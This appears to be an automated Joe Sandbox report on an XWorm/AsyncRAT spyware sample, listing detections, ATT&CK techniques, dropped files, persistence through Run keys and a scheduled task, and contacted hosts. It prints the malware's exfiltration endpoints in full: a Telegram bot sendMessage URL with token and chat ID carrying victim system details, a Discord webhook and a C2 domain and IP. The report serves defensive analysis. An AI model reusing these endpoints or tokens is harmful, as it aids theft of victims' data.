Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ozgpPwVAu1.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adawsfaefasfasfg.exe PID: 7732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wasdwasfwasfs.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2591449977.0000000002F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ozgpPwVAu1.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adawsfaefasfasfg.exe PID: 7732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wasdwasfwasfs.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	12 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 Input Capture	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	33 System Information Discovery	Remote Desktop Protocol	1 Input Capture	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Obfuscated Files or Information	Security Account Manager	451 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	23 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	161 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	221 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	161 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
ozgpPwVAu1.exe	63%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
ozgpPwVAu1.exe	100%	Avira	TR/Dropper.Gen
ozgpPwVAu1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\adawsfaefasfasfg.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\wasdwasfwasfs.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Roaming\Systen User	100%	Avira	TR/Spy.Gen
C:\Users\user\adawsfaefasfasfg.exe	100%	Joe Sandbox ML
C:\Users\user\wasdwasfwasfs.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Systen User	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.microsoft.coO	0%	Avira URL Cloud	safe
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0	0%	Avira URL Cloud	safe
http://www.micom/pki/certs/Miut_2010-06-23.cr	0%	Avira URL Cloud	safe
http://www.microsoft.coj	0%	Avira URL Cloud	safe
147.185.221.22	0%	Avira URL Cloud	safe
http://osoft.co	0%	Avira URL Cloud	safe
http://crl.micro/pki/crl/productCerAut_2010-06-2	0%	Avira URL Cloud	safe
http://www.micom/pkiops/Docs/ry.htm0	0%	Avira URL Cloud	safe
https://api.telegrP	0%	Avira URL Cloud	safe
carolina-comes.gl.at.ply.gg	100%	Avira URL Cloud	malware
http://www.microsoft.$	0%	Avira URL Cloud	safe
http://crl.v	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
carolina-comes.gl.at.ply.gg	147.185.221.22	true	true	unknown
ip-api.com	208.95.112.1	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
api.telegram.org	149.154.167.220	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2	false		high
147.185.221.22	true	Avira URL Cloud: safe	unknown
carolina-comes.gl.at.ply.gg	true	Avira URL Cloud: malware	unknown
127.0.0.1	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0	powershell.exe, 0000000E.00000002.1820911519.0000013FE7850000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=75388	adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003180000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1470720955.000002853FD37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1761595477.0000013FDF314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1750246959.0000012AEDCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2055474118.0000017199AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003184000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, adawsfaefasfasfg.exe.0.dr, wasdwasfwasfs.exe.0.dr, Systen User.2.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000008.00000002.1413749213.0000015D62429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FEE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF4C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189C9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.coO	powershell.exe, 00000016.00000002.2393163849.000001286FE40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000009.00000002.1492888192.00000285480D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro/pki/crl/productCerAut_2010-06-2	powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 0000000E.00000002.1823526191.0000013FE78E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2396145614.0000012870040000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mic	powershell.exe, 00000010.00000002.1807879075.0000012AF6474000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://osoft.co	powershell.exe, 0000000E.00000002.1823526191.0000013FE78E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discordapp.com/api/webhooks/1309170780696870912/8yNfzeRdjxyYLYxaut1-j0gdfkndb6ZneH0LI8EP6wjx	where.exe, 00000007.00000002.1328741520.0000028CA97B4000.00000004.00000020.00020000.00000000.sdmp, PIN CRACKER V2.bat.0.dr	false		high
http://www.micom/pki/certs/Miut_2010-06-23.cr	powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.gg/2e8UXZp2Fq	PIN CRACKER V2.bat.0.dr	false		high
http://www.microsoft.coj	powershell.exe, 00000009.00000002.1497525479.000002854858D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod-C:	qmgr.db.31.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.1413749213.0000015D62429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FEE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF4C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189C9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2-C:	svchost.exe, 0000001F.00000003.2560713768.0000024CFDDA0000.00000004.00000800.00020000.00000000.sdmp, edb.log.31.dr	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.1470720955.000002853FD37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1761595477.0000013FDF314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1750246959.0000012AEDCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2055474118.0000017199AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegrP	adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003184000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micft.cMicRosof	powershell.exe, 00000010.00000002.1807879075.0000012AF6474000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000008.00000002.1413749213.0000015D62201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FCC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857861000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.$	powershell.exe, 0000000E.00000002.1819411525.0000013FE7783000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1413749213.0000015D62201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FCC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857861000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.v	powershell.exe, 00000016.00000002.2385958068.000001286FCB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
147.185.221.22	carolina-comes.gl.at.ply.gg	United States	12087	SALSGIVERUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570394
Start date and time:	2024-12-06 22:44:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ozgpPwVAu1.exe renamed because original name is a hash value
Original Sample Name:	622b720c1733ce7dfd2e1d5f11f9c0c8bd93f11fcae3341a5db5b8a03cca7968.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@37/37@3/4
EGA Information:	Successful, ratio: 20%
HCA Information:	Successful, ratio: 100% Number of executed functions: 94 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Systen User, PID 4872 because it is empty
Execution Graph export aborted for target ozgpPwVAu1.exe, PID 7644 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1020 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2188 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4080 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7572 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8024 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8032 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: ozgpPwVAu1.exe

Simulations

Behavior and APIs

Time	Type	Description
16:45:03	API Interceptor	102x Sleep call for process: powershell.exe modified
16:45:49	API Interceptor	236258x Sleep call for process: wasdwasfwasfs.exe modified
16:46:48	API Interceptor	77x Sleep call for process: adawsfaefasfasfg.exe modified
16:46:59	API Interceptor	1x Sleep call for process: OpenWith.exe modified
16:47:00	API Interceptor	1x Sleep call for process: svchost.exe modified
21:46:48	Task Scheduler	Run new task: Systen User path: C:\Users\user\AppData\Roaming\Systen s>User
21:46:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Systen User C:\Users\user\AppData\Roaming\Systen User
21:46:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Systen User C:\Users\user\AppData\Roaming\Systen User
21:47:08	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systen User.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	CPym6H29BR.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	cJ6xbAA5Rn.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	ip-api.com/json/
	e2mzbWePHw.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	ip-api.com/json/
	Transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	ip-api.com/line/?fields=hosting
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse	ip-api.com/json/?fields=225545
149.154.167.220	vUlh7stUHJ.exe	Get hash	malicious	XWorm	Browse
	TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	http://url969.uniteddeleverycompany.com/ls/click?upn=u001.H7qy8CwvNpiem-2Bf7DeMFk7YJf68sOidxEWakApUPIOSZg2OY8dbdpgPNdKDwG5r9FFRxGTcDR4Y40gkedjWn5gmaEy2hdp5PhuemKZpyV0zDF4yZB1nSDE1glVUHkAxvk-2Bay1ScD58FIOgYpgYP6N0ScK3-2BfYjxiyiX8IVVnDpwETyB9eFyZIpVwHB3s73fG91OsUU5I5qElZ5zc-2F019KUvyyM6RxeXMegmcNjDutTA-2FnxufBtCMFX4wRkoDOM-2BzzsCiJIoY1mc9q42wLMHiq-2B4vv2-2FqoR1f2l-2BCmuACM5q-2FNbDZQstkQL5-2FH30fC7m19Rn-2BlXgwexRgjH0XwyNE8I2tRC8iv5uAUiLQk1AD6k0bLjsvdQWk9bfnh9YPL7n6nCIBdvs55pyxgyRAhb2C3g-3D-3DzLOu_oNIH2-2FxJ-2FTe1FaVJ1jWIKVy-2BRH8quBB-2F7-2FAZY1zuBa8sYO3A2kRlNC5SRLFjReRDbNAqQc8ija5eyvb3hMHW2LijdhuT99ojcYbvfeVDR6TjM8Iqq-2F4lpz7WKfkjLfs8kULSyk-2BJ2FHXElRwIq2EjJuur8G9AAw0HjpCQ3JV-2F1d4REvZ-2BdaWGeRZa46RgdqnKhZwT4HPC-2Fcr9dZBwLnURfD1x7OZfW9R3B1ZDWRdH1V-2F-2BR-2FWmM6h4NEHHRb9NNBhFNZPaY6piFBOFNOupA2OrFLOTElocKhsbRyDVGAbiBMte7-2BAjR-2BA2H-2F9CP2UREBvDHXsH-2BmlqvAryDrKjjAy8lTbA9nho9WLS1JKeGns5pAqmjv-2FPH8p3m8V8tFEPj2WLqfG6IzXwKcOMYvSrGYkMWMsBKmgc-2Bt-2BOg9a0jxMR-2BByynWcTgKhB44PNmoRQfd9lvEhtXtJnUleVDwJMZbPw60p1K6oxTexhzM9ScXx7kCprkCgMgcfi8rgis43afOn4xM8YRcMg9tIzu64CU7VuKJ-2BMFN5I78-2B8KPrNOjHK5o6ri9rwGpR8XbmEC-2BUi0PISrd7M-2BHCYWlP2o1TBL2OAmqufIzKPL-2F0NYk7NCFq-2BQEFmracNk-2BqqlMZ00PhqEs2JN98lsOxQ6MUbXZMcj-2FhqVBZVN97wkN60D56kJ-2FOQiaa7gW2IP4afUKBiy9Wl-2B0h0QTfxVEz3DZUlxRmNpooAbQL5Uk9Km4liDjAnP-2F9rKBZSc3OZEf33ZNLDn8jMDI2p9XCpZ-2BdDlLCTUAgCLNK0FE-2BJVvF9LYHxIrcC8tpkLszOdDeZHX2xcWm6Lc3y7tQCdb1uaEkAxyHmalygulTA8ODCE0Qj21BBKduU8fdD8C7u4Nqc-2BpJjM-2FhEfOBaq9vq0rNhSs4OVsJ7hESECV5WQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse
	e2mzbWePHw.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse
	fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Fiyat Teklifi_2038900001-MOKAPTO-06122024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO54782322024.exe	Get hash	malicious	AgentTesla	Browse
	BQ_PO#385995.exe	Get hash	malicious	RedLine, Snake Keylogger, VIP Keylogger, XWorm	Browse
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	CPym6H29BR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	cJ6xbAA5Rn.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	e2mzbWePHw.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	Transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	208.95.112.1
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse	208.95.112.1
s-part-0035.t-0009.t-msedge.net	https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2dd	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	https://m0g9861wc1.execute-api.us-east-1.amazonaws.com/uyt/#alissa.bessette@eastwesttea.com	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	BGM LAW GROUP - RFP 2024.pdf	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	https://docs.google.com/presentation/d/e/2PACX-1vQdSuwONgWFnuoaK9jWkn4a4T1fFD4ixA3V2X7f5aWnD4sHxk2b10z2j2TMxkq3G15FQX3bbwReJ2PF/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	https://docs.google.com/presentation/d/e/2PACX-1vQdSuwONgWFnuoaK9jWkn4a4T1fFD4ixA3V2X7f5aWnD4sHxk2b10z2j2TMxkq3G15FQX3bbwReJ2PF/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	13.107.246.63
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	13.107.246.63
